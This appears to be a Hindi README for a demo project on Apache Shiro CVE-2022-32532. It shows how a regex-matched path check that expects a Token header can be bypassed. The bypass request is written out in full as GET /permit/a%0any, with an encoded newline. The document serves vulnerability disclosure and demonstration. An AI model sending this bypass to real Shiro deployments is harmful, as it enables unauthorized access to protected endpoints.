
Apache Shiro CVE-2022-32532
यह एक डेमो प्रोजेक्ट है, जो केवल इस कमजोरी (CVE-2022-32532) का शोषण करने की एक शर्त को दर्शाता है।
वास्तव में, इसका शोषण करने के और भी तरीके हैं, जब तक डेवलपर्स RegExPatternMatcher का उपयोग करते हैं, तब तक एक संभावित बाइपास कमजोरी होगी।
वर्तमान कॉन्फ़िगरेशन के तहत टोकन अनुरोध हेडर सत्यापन आवश्यक है, अन्यथा आपको /permit के अंतर्गत इंटरफ़ेस तक पहुँचने की अनुमति नहीं है।
यह अनुरोध सफल हो सकता है
GET /permit/any HTTP/1.1
Token: 4ra1n
जब कोई टोकन अनुरोध हेडर नहीं होता है तो पहुँच की अनुमति नहीं है
GET /permit/any HTTP/1.1
इसे विशेष लेकिन सामान्य कॉन्फ़िगरेशन में सरल तरीके से बाइपास किया जा सकता है
GET /permit/a%0any HTTP/1.1
https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
यह कमजोरी Spring-Security CVE-2022-22978 के समान है
धन्यवाद bdemers (Apache Shiro PMC) और chybeta (सुरक्षा शोधकर्ता) को।